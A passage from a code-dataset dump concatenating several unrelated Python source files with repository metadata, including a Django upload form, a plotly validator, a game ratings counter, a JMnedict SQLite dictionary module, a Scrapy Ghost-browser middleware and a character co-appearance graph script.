app = webapp.WSGIApplication([('/.*', earthwormOutputPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
| [
"hongtao510@gmail.com"
] | hongtao510@gmail.com |
cda5bf2dba75c987106ec62af214b96ca5667188 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /870.advantage-shuffle.python3.py | 362f8e0a67857cb39a5b44204dba1afd05679778 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | #
# [901] Advantage Shuffle
#
# https://leetcode.com/problems/advantage-shuffle/description/
#
# algorithms
# Medium (40.29%)
# Total Accepted: 7.5K
# Total Submissions: 18.5K
# Testcase Example: '[2,7,11,15]\n[1,10,4,11]'
#
# Given two arrays A and B of equal size, the advantage of A with respect to B
# is the number of indices i for which A[i] > B[i].
#
# Return any permutation of A that maximizes its advantage with respect to
# B.
#
#
#
#
# Example 1:
#
#
# Input: A = [2,7,11,15], B = [1,10,4,11]
# Output: [2,11,7,15]
#
#
#
# Example 2:
#
#
# Input: A = [12,24,8,32], B = [13,25,32,11]
# Output: [24,32,8,12]
#
#
#
#
# Note:
#
#
# 1 <= A.length = B.length <= 10000
# 0 <= A[i] <= 10^9
# 0 <= B[i] <= 10^9
#
#
#
#
#
class Solution:
def advantageCount(self, A, B):
"""
:type A: List[int]
:type B: List[int]
:rtype: List[int]
"""
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
89f4deab11dc827abf63d32d7e4af23a4e08f4ab | b031132a8ca2727827f6b1bb75f5839d327885bf | /bookworm/api/forms.py | 8b7049f862db44ea99c9d7d43892d1a1cb2ecc0a | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | erochest/threepress-rdfa | 3441ba9f272bad439b9689968cd1f668fae5c4f6 | f07e10da8a4927ab21084f4ba015d6567e665cae | refs/heads/master | 2021-07-16T21:24:00.356147 | 2011-06-10T20:42:14 | 2011-06-10T20:42:14 | 1,845,226 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | from django import forms
class APIUploadForm(forms.Form):
    """Validates API uploads: an EPUB payload plus the caller's API key."""
    # Raw EPUB file contents uploaded by the client.
    epub_data = forms.FileField()
    # Caller's API key string; presumably checked against a user record elsewhere — TODO confirm.
    api_key = forms.CharField(max_length=255)
| [
"none@none"
] | none@none |
4d90b9ba43f5cf53dd31827df98d8a68ea8fa9cb | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/scattercarpet/marker/_anglesrc.py | 3d469a500245c6cb620654f07d276ace9b20b460 | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 424 | py | import _plotly_utils.basevalidators
class AnglesrcValidator(_plotly_utils.basevalidators.SrcValidator):
    """Src validator for the `anglesrc` property of `scattercarpet.marker`."""

    def __init__(
        self, plotly_name="anglesrc", parent_name="scattercarpet.marker", **kwargs
    ):
        # Default the edit type to "none" unless the caller overrides it.
        edit_type = kwargs.pop("edit_type", "none")
        super(AnglesrcValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            **kwargs,
        )
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
236f18e6d06d06f7411c509b2804609daba2be41 | 0ca5780b8a121b90e2191d7e394e35f49ab68828 | /tools/ratings.py | e6cc4467ebefa6bfa5fde9a97a901f84d3d5d6b0 | [
"MIT"
] | permissive | Ghloin/tweeria | 805091a40a2625f4983b960ccd477af6ffb1c1ba | 5f7cf917a6e08f15cd914c11823dbd81c11b95a1 | refs/heads/master | 2021-01-21T05:59:24.279175 | 2015-04-11T23:49:09 | 2015-04-11T23:49:09 | 33,859,414 | 1 | 0 | null | 2015-04-13T09:22:40 | 2015-04-13T09:22:39 | null | UTF-8 | Python | false | false | 8,313 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This is rating counter
# author: Alex Shteinikov
import __init__
import settings
import time
import random
tweenk_core = settings.core()
tweenk_balance = settings.balance()
import db
import logger
import time
class ratingsCounter:
    """Recompute player/guild ratings and daily game statistics in MongoDB."""

    # Tuning constants for the trending-score formula.
    K1 = 0.02
    K2 = 1.5
    K_kill = 100
    RD = 25  # max random jitter added to a trending score, in percent

    mongo = db.mongoAdapter()
    balance = settings.balance()
    core = settings.core()
    log = logger.logger('logs/system_events.log')

    def __init__(self):
        pass

    def countUserRatings(self):
        """Recompute each player's rank by exp, pvp, achievements and trending."""

        def countTheUserRating(sort_field, result_field):
            # Rank players by sort_field (descending) and store the 1-based
            # place into result_field; banned players get the sentinel 100500.
            self.players.sort(key=lambda x: x[sort_field])
            self.players.reverse()
            place = 1
            for player in self.players:
                if 'banned' in player and player['banned']:
                    player.update({result_field: 100500})
                else:
                    player.update({result_field: place})
                    place += 1

        starttime = time.time()
        for player in self.players:
            # Multiply level by 100 million and add experience, so that the
            # ranking compares a single combined value instead of comparing
            # twice (first by level, then by experience).
            player.update({'rating':player['lvl']*100000000+player['exp']})
            # If we have no info on how many of the player's tweets were
            # parsed today, assume 0.
            if not 'today_parsed_tweets' in player:
                player.update({'today_parsed_tweets': 0})
            # If we have no record of yesterday's pvp score, treat the whole
            # current score as earned today.
            if not 'prev_day_pvp' in player:
                player.update({'pvp_per_day': player['pvp_score']})
            else:
                player.update({'pvp_per_day': player['pvp_score'] - player['prev_day_pvp']})
            # Compute the player's trending score from kill metrics; kills of
            # lower-level monsters are weighted down via max_lvl - lvl*K2.
            global_metric = 0
            if player['lvl'] == 1:
                global_metric = 0
            else:
                if 'metrics' in player:
                    if 'monster_kill' in player['metrics']:
                        for hour in player['metrics']['monster_kill']:
                            global_metric += (self.balance.max_lvl-player['metrics']['monster_kill'][hour]['lvl']*self.K2)*self.K1*self.K_kill*player['metrics']['monster_kill'][hour]['value']
                else:
                    global_metric = 0
            # Damp the score for players already in the trending top 10 so
            # the leaderboard rotates over time.
            try:
                if player['ratings']['trending_position'] <= 10:
                    if player['ratings']['trending_position'] <= 3:
                        global_metric = global_metric * 0.7
                    elif player['ratings']['trending_position'] <= 7:
                        global_metric = global_metric * 0.8
                    else:
                        global_metric = global_metric * 0.9
            except Exception:
                pass
            # Add up to RD percent of random jitter.
            global_metric = global_metric + global_metric/100 * random.randint(0,self.RD)
            player.update({'trending_score': global_metric})
        # Global ranking of players by experience; since 'rating' combines
        # level and exp, ties on level are broken by experience.
        countTheUserRating('rating', 'rating_by_exp')
        # ... global ranking by pvp points
        countTheUserRating('pvp_score', 'rating_by_pvp')
        # ... global ranking by achievement points
        countTheUserRating('achv_points', 'rating_by_achv_points')
        # ... trending players
        countTheUserRating('trending_score', 'trending_position')
        for player in self.players:
            record = {
                'rating_by_exp': player['rating_by_exp'],
                'rating_by_pvp': player['rating_by_pvp'],
                'rating_by_achv_points': player['rating_by_achv_points'],
                'trending_position': player['trending_position'],
                'trending_score': player['trending_score']
            }
            self.mongo.update('players', {'_id':player['_id']}, {'ratings':record})
        message = 'Player ratings was counted by '+str(time.time()-starttime)+' seconds'
        self.log.write(message)
        print message

    def countGuildRatings(self):
        """Recompute guild rankings from member stats aggregated per guild."""

        def countGuildRating(field):
            # Rank guilds by `field` (descending), then overwrite that same
            # field with the 1-based place.
            self.guilds.sort(key=lambda x: x[field])
            self.guilds.reverse()
            place = 1
            for guild in self.guilds:
                guild.update({field: place})
                place += 1

        starttime = time.time()
        for guild in self.guilds:
            guild.update({
                'buff_global_metric': 0,
                'buff_rating': 0,
                'buff_pvp': 0,
                'pvp_score': 0,
            })
            query = []
            for id in guild['people']:
                query.append({'_id':id})
            members = self.mongo.getu('players', search = {'$or':query}, fields = {'lvl':1, 'pvp_score':1, 'ratings':1})
            # Aggregate member stats; members missing 'ratings' are skipped.
            for player in members:
                try:
                    guild['buff_global_metric'] += player['ratings']['trending_score']
                    guild['buff_rating'] += player['lvl']
                    guild['buff_pvp'] += player['pvp_score']
                except Exception:
                    pass
            # Guilds with fewer than 5 members get no trending score.
            if len(members)<5:
                guild['buff_global_metric'] = 0
            guild['pvp_score'] = int(guild['buff_pvp'])
        # Rank guilds by the sum of member levels ...
        countGuildRating('buff_rating')
        # ... by the sum of member trending scores ...
        countGuildRating('buff_global_metric')
        # ... and by the total member pvp_score.
        countGuildRating('buff_pvp')
        for guild in self.guilds:
            # NOTE: at this point the buff_* fields hold ranking places, not
            # the aggregated sums -- countGuildRating overwrote them above.
            record = {
                'rating_place_members_lvl': guild['buff_rating'],
                'rating_place_members_pvp': guild['buff_pvp'],
                'trending_position': guild['buff_global_metric'],
                'pvp_score': guild['pvp_score']
            }
            self.mongo.update('guilds',{'_id':guild['_id']}, {'ratings':record})
        message = 'Guilds ratings was counted by '+str(time.time()-starttime)+' seconds'
        self.log.write(message)
        print message

    def countAll(self):
        """Load players/guilds, recompute all ratings, sentinel-out banned players."""
        self.players = self.mongo.getu('players', {'banned':{'$exists':False}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1, 'ratings':1})
        self.banned_players = self.mongo.getu('players', {'banned':{'$exists':True}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1})
        self.guilds = self.mongo.getu('guilds',{},{'id':1, 'name':1, 'people':1})
        self.countUserRatings()
        self.countGuildRatings()
        # Banned players are pushed to the bottom of every leaderboard.
        for player in self.banned_players:
            record = {
                'rating_by_exp': 100500,
                'rating_by_pvp': 100500,
                'rating_by_achv_points': 100500,
                'trending_position': 100500,
                'trending_score': 0
            }
            self.mongo.update('players', {'_id':player['_id']}, record)
        self.exit()

    def countGameStatistics(self):
        """Recompute per-faction player counts and average levels."""
        count_players = []
        for index in range(0, len(self.balance.faction)):
            query = {'faction': index, '$or': [{'race': 0}, {'race':1}]}
            count_players.append(self.mongo.count('players', query))
        count_avg_level = [0,0,0]
        players = self.mongo.getu('players', {}, {'lvl':1, 'faction':1})
        for player in players:
            count_avg_level[player['faction']] += player['lvl']
        for index in range(0, len(self.balance.faction)):
            try:
                # Average member level per faction, rounded to one decimal.
                count_avg_level[index] = float(int(float(count_avg_level[index]) / count_players[index] * 10))/10
            except Exception:
                count_avg_level[index] = 0.0
        current_time = time.localtime()
        # hashkey identifies the calendar day (year + day-of-year).
        hashkey = str(current_time.tm_year) + str(current_time.tm_yday)
        lastday_stat = self.mongo.find('game_statistics', {'type': 'lastday_avg_level'})
        # Snapshot "yesterday" stats at most once per day (after 20:00).
        if not lastday_stat or time.localtime().tm_hour > 20 and not lastday_stat['hashkey'] == hashkey:
            self.mongo.update('game_statistics', {'type': 'lastday_avg_level'}, {'type': 'lastday_avg_level', 'data': count_avg_level, 'hashkey': hashkey}, True)
            self.mongo.update('game_statistics', {'type': 'lastday_count'}, {'type': 'lastday_count', 'data': count_players, 'hashkey': hashkey}, True)
        # Current stats are refreshed on every run.
        self.mongo.update('game_statistics', {'type': 'players_count'}, {'type': 'players_count', 'data': count_players}, True)
        self.mongo.update('game_statistics', {'type': 'players_avg_level'}, {'type': 'players_avg_level', 'data': count_avg_level}, True)

    def exit(self):
        """Flush and close the system-events log file."""
        self.log.closeFile()
# Script entry point: refresh per-faction statistics, then all ratings.
if __name__ == "__main__":
    urc = ratingsCounter()
    urc.countGameStatistics()
    urc.countAll()
| [
"alex.shteinikov@gmail.com"
] | alex.shteinikov@gmail.com |
19ce91ea22e989da8ca864d594d02929a2b81e0f | 2ac1b9ccc4d4f7f646a33e5646ed5e182ae85727 | /jamdict/jmnedict_sqlite.py | 06df43e4840531842c7f6bb7bd7887641f3844a0 | [
"MIT"
] | permissive | killawords/jamdict | 3655185f7097365b184b7979a112469430c4179f | 85c66c19064977adda469e3d0facf5ad9c8c6866 | refs/heads/main | 2023-05-28T22:00:00.813811 | 2021-06-06T04:04:03 | 2021-06-06T04:04:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,061 | py | # -*- coding: utf-8 -*-
"""
Japanese Multilingual Named Entity Dictionary (JMnedict) in SQLite format
References:
ENAMDICT/JMnedict - Japanese Proper Names Dictionary Files
https://www.edrdg.org/enamdict/enamdict_doc.html
"""
# This code is a part of jamdict library: https://github.com/neocl/jamdict
# :copyright: (c) 2020 Le Tuan Anh <tuananh.ke@gmail.com>
# :license: MIT, see LICENSE for more details.
import os
import logging
from typing import Sequence
from puchikarui import Schema
from . import __version__ as JAMDICT_VERSION, __url__ as JAMDICT_URL
from .jmdict import Meta, JMDEntry, KanjiForm, KanaForm, Translation, SenseGloss
# -------------------------------------------------------------------------------
# Configuration
# -------------------------------------------------------------------------------
MY_FOLDER = os.path.dirname(os.path.abspath(__file__))
SCRIPT_FOLDER = os.path.join(MY_FOLDER, 'data')
JMNEDICT_SETUP_FILE = os.path.join(SCRIPT_FOLDER, 'setup_jmnedict.sql')
JMNEDICT_VERSION = '1.08'
JMNEDICT_URL = 'https://www.edrdg.org/enamdict/enamdict_doc.html'
JMNEDICT_DATE = '2020-05-29'
JMNEDICT_SETUP_SCRIPT = '''INSERT INTO meta VALUES ('jmnedict.version', '{jv}');
INSERT INTO meta VALUES ('jmnedict.url', '{ju}');
INSERT INTO meta VALUES ('jmnedict.date', '{jud}');
INSERT INTO meta SELECT 'generator', 'jamdict' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator');
INSERT INTO meta SELECT 'generator_version', '{gv}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_version');
INSERT INTO meta SELECT 'generator_url', '{gu}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_url');'''.format(
jv=JMNEDICT_VERSION,
ju=JMNEDICT_URL,
jud=JMNEDICT_DATE,
gv=JAMDICT_VERSION,
gu=JAMDICT_URL
)
def getLogger():
    """Return the logger associated with this module's dotted name."""
    module_logger = logging.getLogger(__name__)
    return module_logger
# -------------------------------------------------------------------------------
# Models
# -------------------------------------------------------------------------------
class JMNEDictSchema(Schema):
    """puchikarui Schema describing the JMnedict SQLite database layout.

    Registers the setup SQL (table creation plus metadata inserts) and
    declares each table so it can be accessed through the ORM-style API.
    """

    def __init__(self, db_path, *args, **kwargs):
        super().__init__(db_path, *args, **kwargs)
        self.add_script(JMNEDICT_SETUP_SCRIPT)
        self.add_file(JMNEDICT_SETUP_FILE)
        # Meta
        self.add_table('meta', ['key', 'value'], proto=Meta).set_id('key')
        # One row per named-entity entry (keyed by JMnedict sequence number)
        self.add_table('NEEntry', ['idseq'])
        # Kanji
        self.add_table('NEKanji', ['ID', 'idseq', 'text'])
        # Kana
        self.add_table('NEKana', ['ID', 'idseq', 'text', 'nokanji'])
        # Translation (~Sense of JMdict)
        self.add_table('NETranslation', ['ID', 'idseq'])
        self.add_table('NETransType', ['tid', 'text'])
        self.add_table('NETransXRef', ['tid', 'text'])
        self.add_table('NETransGloss', ['tid', 'lang', 'gend', 'text'])
class JMNEDictSQLite(JMNEDictSchema):
    """Read/write access layer for a JMnedict database stored in SQLite."""

    def __init__(self, db_path, *args, **kwargs):
        super().__init__(db_path, *args, **kwargs)

    def all_ne_type(self, ctx=None):
        """Return all distinct named-entity type strings from NETransType."""
        if ctx is None:
            return self.all_ne_type(ctx=self.ctx())
        else:
            return [x['text'] for x in ctx.execute("SELECT DISTINCT text FROM NETransType")]

    def _build_ne_search_query(self, query):
        """Build a (where-clause, params) pair matching kanji, kana, gloss or type.

        A '_', '@' or '%' in *query* switches to SQL LIKE matching; a query
        of the form 'id#<non-negative int>' looks the entry up by idseq.
        """
        _is_wildcard_search = '_' in query or '@' in query or '%' in query
        if _is_wildcard_search:
            where = "idseq IN (SELECT idseq FROM NEKanji WHERE text like ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text like ?)"
        else:
            where = "idseq IN (SELECT idseq FROM NEKanji WHERE text == ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text == ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text == ?) or idseq in (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text == ?)"
        params = [query, query, query, query]
        try:
            if query.startswith('id#'):
                query_int = int(query[3:])
                if query_int >= 0:
                    where = "idseq = ?"
                    params = [query_int]
        except Exception:
            # Non-numeric id# suffix: fall back to the text search above.
            pass
        getLogger().debug(f"where={where} | params={params}")
        return where, params

    def search_ne(self, query, ctx=None, **kwargs) -> Sequence[JMDEntry]:
        """Return a list of entries whose kanji/kana/gloss/type matches *query*."""
        if ctx is None:
            with self.ctx() as ctx:
                return self.search_ne(query, ctx=ctx)
        where, params = self._build_ne_search_query(query)
        where = 'SELECT idseq FROM NEEntry WHERE ' + where
        entries = []
        for (idseq,) in ctx.conn.cursor().execute(where, params):
            entries.append(self.get_ne(idseq, ctx=ctx))
        return entries

    def search_ne_iter(self, query, ctx=None, **kwargs):
        """Yield matching entries one at a time.

        NOTE(review): since this function contains ``yield`` it is a
        generator, so the ctx-None branch's ``return`` yields nothing
        instead of producing search_ne's list -- callers should pass an
        explicit ctx. TODO confirm intended behavior.
        """
        if ctx is None:
            with self.ctx() as ctx:
                return self.search_ne(query, ctx=ctx)
        where, params = self._build_ne_search_query(query)
        where = 'SELECT idseq FROM NEEntry WHERE ' + where
        for (idseq,) in ctx.conn.cursor().execute(where, params):
            yield self.get_ne(idseq, ctx=ctx)

    def get_ne(self, idseq, ctx=None) -> JMDEntry:
        """Fetch one full entry (kanji, kana, translations) by sequence id."""
        # ensure context
        if ctx is None:
            with self.ctx() as new_context:
                # NOTE(review): get_entry is not defined in this class --
                # presumably inherited or a typo for get_ne; confirm.
                return self.get_entry(idseq, new_context)
        # else (a context is provided)
        # select entry & info
        entry = JMDEntry(idseq)
        # select kanji
        kanjis = ctx.NEKanji.select('idseq=?', (idseq,))
        for dbkj in kanjis:
            kj = KanjiForm(dbkj.text)
            entry.kanji_forms.append(kj)
        # select kana
        kanas = ctx.NEKana.select('idseq=?', (idseq,))
        for dbkn in kanas:
            kn = KanaForm(dbkn.text, dbkn.nokanji)
            entry.kana_forms.append(kn)
        # select senses
        senses = ctx.NETranslation.select('idseq=?', (idseq,))
        for dbs in senses:
            s = Translation()
            # name_type
            nts = ctx.NETransType.select('tid=?', (dbs.ID,))
            for nt in nts:
                s.name_type.append(nt.text)
            # xref
            xs = ctx.NETransXRef.select('tid=?', (dbs.ID,))
            for x in xs:
                s.xref.append(x.text)
            # SenseGloss
            gs = ctx.NETransGloss.select('tid=?', (dbs.ID,))
            for g in gs:
                s.gloss.append(SenseGloss(g.lang, g.gend, g.text))
            entry.senses.append(s)
        return entry

    def insert_name_entities(self, entries, ctx=None):
        """Insert a batch of entries, sharing one context for all of them."""
        # ensure context
        if ctx is None:
            with self.ctx() as new_context:
                return self.insert_name_entities(entries, ctx=new_context)
        # else
        for entry in entries:
            self.insert_name_entity(entry, ctx)

    def insert_name_entity(self, entry, ctx=None):
        """Insert one entry and all of its kanji/kana/translation rows."""
        # ensure context
        if ctx is None:
            with self.ctx() as ctx:
                return self.insert_name_entity(entry, ctx=ctx)
        # else (a context is provided)
        self.NEEntry.insert(entry.idseq, ctx=ctx)
        # insert kanji
        for kj in entry.kanji_forms:
            ctx.NEKanji.insert(entry.idseq, kj.text)
        # insert kana
        for kn in entry.kana_forms:
            ctx.NEKana.insert(entry.idseq, kn.text, kn.nokanji)
        # insert translations
        for s in entry.senses:
            tid = ctx.NETranslation.insert(entry.idseq)
            # insert name_type
            for nt in s.name_type:
                ctx.NETransType.insert(tid, nt)
            # xref
            for xr in s.xref:
                ctx.NETransXRef.insert(tid, xr)
            # Gloss
            for g in s.gloss:
                ctx.NETransGloss.insert(tid, g.lang, g.gend, g.text)
| [
"tuananh.ke@gmail.com"
] | tuananh.ke@gmail.com |
9582722a0a7a9d3283bbfeee9cb7ddad8e6c377f | 67117705720a3e3d81253ba48c1826d36737b126 | /Wk9_STRANDS/integrate.py | 42e4a34b47cb63349193c1740e61a7048b7bc760 | [] | no_license | pyliut/Rokos2021 | 41f0f96bc396b6e8a5e268e31a38a4a4b288c370 | 70753ab29afc45766eb502f91b65cc455e6055e1 | refs/heads/main | 2023-08-13T17:29:30.013829 | 2021-09-26T19:01:35 | 2021-09-26T19:01:35 | 382,092,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 28 15:05:28 2021
@author: pyliu
"""
import numpy as np
def integrate(integrand, spacing):
    """Numerical integration using the rectangle rule.

    Parameters
    ----------
    integrand : FLOAT, vector
        Values of the integrand over the range of integration.
    spacing : FLOAT, scalar
        Width of the integrating strips.

    Returns
    -------
    FLOAT, scalar
        Integrated value (sum of samples times strip width).
    """
    total = np.sum(integrand)
    return total * spacing
"noreply@github.com"
] | pyliut.noreply@github.com |
9c356ecfd41e1d77531a0992d3aeeab8306f56b4 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/imooc/middlewares.py | d2bed55b4f0789f23a3e7d00661f72239c8ef9df | [] | no_license | enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,174 | py | from scrapy.http import HtmlResponse, Request, Response
from scrapy.exceptions import IgnoreRequest
from multiprocessing import Process, Pipe
from ghost import Ghost
class GhostAction:
    """Deferred browser action: stores call arguments and replays them later.

    The positional/keyword arguments given at construction are kept on the
    instance and forwarded to :meth:`action` when :meth:`do` is invoked.
    """

    def __init__(self, *args, **kwargs):
        self.args, self.kwargs = args, kwargs

    def do(self, session):
        """Execute this action against *session*, forwarding stored arguments."""
        return self.action(session, *self.args, **self.kwargs)

    def action(self, session, *args, **kwargs):
        """Subclass hook implementing the actual browser interaction."""
        raise NotImplementedError
class DefaultOpenAction(GhostAction):
    """Open a request's URL in the Ghost session, then run its follow-up action."""

    def action(self, session, request):
        page, extra_resources = \
            session.open(request.url, headers=request.headers)
        if request.action:
            # Replay the request's custom action (if any), then wait in case
            # it triggered a navigation; keep the newer page when one loads.
            request.action.do(session)
            page_, extra_resources_ = session.wait_for_page_loaded()
            if page_:
                page, extra_resources = page_, extra_resources_
        return page
class GhostRequest(Request):
    """Scrapy Request rendered through a Ghost browser session.

    When *url* is omitted, a *session* must be given and its current URL is
    used. Requests are always created with dont_filter=True so re-visits of
    the same URL within a session are not deduplicated.
    """

    def __init__(self, url=None, action=None,
                 session=None, isLast=False, *args, **kwargs):
        if not url:
            assert session
            url = session.currentUrl
        super(GhostRequest, self).__init__(url, *args, dont_filter=True, **kwargs)
        self._action = action
        self._isLast = isLast
        self._session = session

    @property
    def session(self):
        """Ghost session this request runs in (None for a fresh session)."""
        return self._session

    @property
    def action(self):
        """Optional GhostAction to replay after opening the page."""
        return self._action

    @property
    def isLast(self):
        """True when the session should be shut down after this request."""
        return self._isLast
class GhostResponse(HtmlResponse):
    """HtmlResponse whose body arrives later from the Ghost worker process.

    NOTE(review): __init__ deliberately does not call the HtmlResponse
    constructor; the response stays uninitialized until waitForInit()
    receives the rendered page over the session's pipe.
    """

    def __init__(self, request, session):
        self.request = request
        self.session = session

    def waitForInit(self):
        """Block until the Ghost process reports a result, then finish init."""
        res = self.session.waitForResult()
        if res:
            super(GhostResponse, self).__init__(request=self.request, **res)
class GhostMiddleware(object):
    """Downloader middleware routing GhostRequests through Ghost sessions."""

    @classmethod
    def from_crawler(cls, crawler):
        return GhostMiddleware()

    def process_request(self, request, spider):
        """Dispatch a GhostRequest to its (possibly new) session.

        Returns a not-yet-initialized GhostResponse; the action is sent to
        the worker without waiting (wait=False) and the response is filled
        in later by process_response. Non-Ghost requests fall through
        (implicit None return).
        """
        if isinstance(request, GhostRequest):
            if request.session:
                session = request.session
                action = request.action
            else:
                # First request of a session: open the URL by default.
                session = GhostSession()
                action = DefaultOpenAction(request)
            session.commitAction(action, wait=False)
            if request.isLast:
                session.exit()
            return GhostResponse(request, session)

    def process_response(self, request, response, spider):
        """Finish initializing GhostResponses by waiting for the worker result."""
        if isinstance(response, GhostResponse):
            response.waitForInit()
        return response
class GhostSession:
    """Client handle for a Ghost browser running in a separate process.

    Actions are sent over a multiprocessing Pipe; results come back as
    dicts (see GhostProcess.sendResult).
    """

    def __init__(self):
        # for the request without url
        self._currentUrl = None
        self.pipe, pipe = Pipe()
        self.startGhostProcess(pipe)

    def startGhostProcess(self, pipe):
        """Spawn the worker process holding the actual Ghost browser."""
        GhostProcess(pipe).start()

    def commitAction(self, action, wait=True):
        """Send a GhostAction (or None to stop the worker) down the pipe.

        NOTE(review): the wait=True path calls self.wait(), which is not
        defined on this class -- presumably waitForResult() was intended;
        current callers all pass wait=False. TODO confirm.
        """
        self.pipe.send(action)
        if wait:
            self.wait()

    def waitForResult(self):
        """Block for the worker's next result dict; remember its URL."""
        res = self.pipe.recv()
        self._currentUrl = res['url']
        return res

    def exit(self):
        """Ask the worker process to shut down (None is the stop sentinel)."""
        self.commitAction(None, False)

    @property
    def currentUrl(self):
        """URL of the page the worker most recently reported."""
        return self._currentUrl
class GhostProcess(Process):
    """Worker process that owns a Ghost browser and executes piped actions."""

    def __init__(self, pipe):
        super().__init__()
        self.pipe = pipe
        self.currentPage = None

    def sendResult(self, session, page):
        """Send the rendered page (url/status/headers/body) back to the client."""
        res = {
            'url': page.url,
            'status': page.http_status,
            'headers': page.headers,
            'body': session.content.encode('utf-8'),
        }
        self.pipe.send(res)

    def updatePage(self, session, page):
        """Track the latest loaded page; poll the session if none was given."""
        if not page:
            page, extra_resources = session.wait_for_page_loaded()
        if page:
            self.currentPage = page

    def run(self):
        # Loop: receive an action, execute it, and report the resulting page;
        # a None action is the shutdown sentinel.
        ghost = Ghost()
        with ghost.start(download_images=False) as session:
            while True:
                action = self.pipe.recv()
                if action is None:
                    break
                page = action.do(session)
                self.updatePage(session, page)
                self.sendResult(session, self.currentPage)
| [
"yaolihui0506"
] | yaolihui0506 |
bb0cc5db2017fd3d697c4422d606f0f9508bb1cf | 9e42f3e16f46ae9161490d459adff263a083b5d8 | /ps5.2.py | c7d9e436fb5328bda9b4482482a800516e3687b0 | [] | no_license | rajshakerp/algorithm_crunching_social_network | ba7dd2d7ff748cb9b7e7e93c151285b9c2c2c575 | 2d197a199ea6bb19d65c82a65d72553be107a369 | refs/heads/master | 2020-06-12T08:03:48.949142 | 2014-06-24T21:14:53 | 2014-06-24T21:14:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,460 | py | # compute the weight of co-appear
import csv
import operator
import heapq
def make_link(G, name, book):
    """Record an undirected edge between *name* and *book* in graph *G*.

    Both endpoints get an adjacency dict (created on demand) with the
    opposite endpoint mapped to 1. Returns *G* for convenience.
    """
    for src, dst in ((name, book), (book, name)):
        G.setdefault(src, {})[dst] = 1
    return G
def read_graph(filename):
    """Read a character/book bipartite graph from a tab-separated file.

    Each line is one edge "<character>\\t<book>". Returns (G, characters)
    where G is the bipartite adjacency dict and characters maps every
    first-column name to 1.
    """
    # Read an undirected graph in CSV format. Each line is an edge
    # NOTE(review): the file handle is never closed explicitly.
    tsv = csv.reader(open(filename), delimiter='\t')
    G = {}
    characters = {}
    for (node1, node2) in tsv:
        make_link(G, node1, node2)
        if node1 not in characters:
            characters[node1] = 1
    return G, characters
def HG_make_link(CG, ch1, ch2):
    """Add (or strengthen by 1) a weighted co-appearance edge ch1 <-> ch2."""
    CG.setdefault(ch1, {}).setdefault(ch2, 0)
    CG.setdefault(ch2, {}).setdefault(ch1, 0)
    CG[ch1][ch2] += 1
    CG[ch2][ch1] += 1
def make_hop_graph(G, characters):
    """Project the bipartite character/book graph onto characters only.

    The resulting edge weight is the number of books two characters share.
    """
    HG = {}
    for ch1 in characters:
        for book in G[ch1]:
            for ch2 in G[book]:
                # avoid double counting the route quantities
                if ch1 > ch2: HG_make_link(HG, ch1, ch2)
    return HG
def WG_make_link(HG, WG, ch1, ch2, routes):
    """Store dijkstra hop counts and distances for ch1 into routes/WG.

    NOTE(review): the ch2 parameter is unused -- confirm whether per-pair
    computation was intended here.
    """
    routes[ch1], WG[ch1] = dijkstra(HG, ch1)
def make_weight_graph(HG, characters):
    """Run dijkstra from each character that has at least one edge.

    Returns (WG, routes): WG maps source -> {target: weighted distance},
    routes maps source -> {target: hop count of the best route}.
    """
    WG = {}
    routes = {}
    for ch1 in HG:
        for ch2 in HG[ch1]:
            # ch1 > ch2 avoids recomputing the same source repeatedly,
            # though dijkstra covers all reachable targets in one call.
            if ch1 > ch2: WG_make_link(HG, WG, ch1, ch2, routes)
    return WG, routes
# should compute the entire route: len([v, b, c, e])
def dijkstra(HG, v):
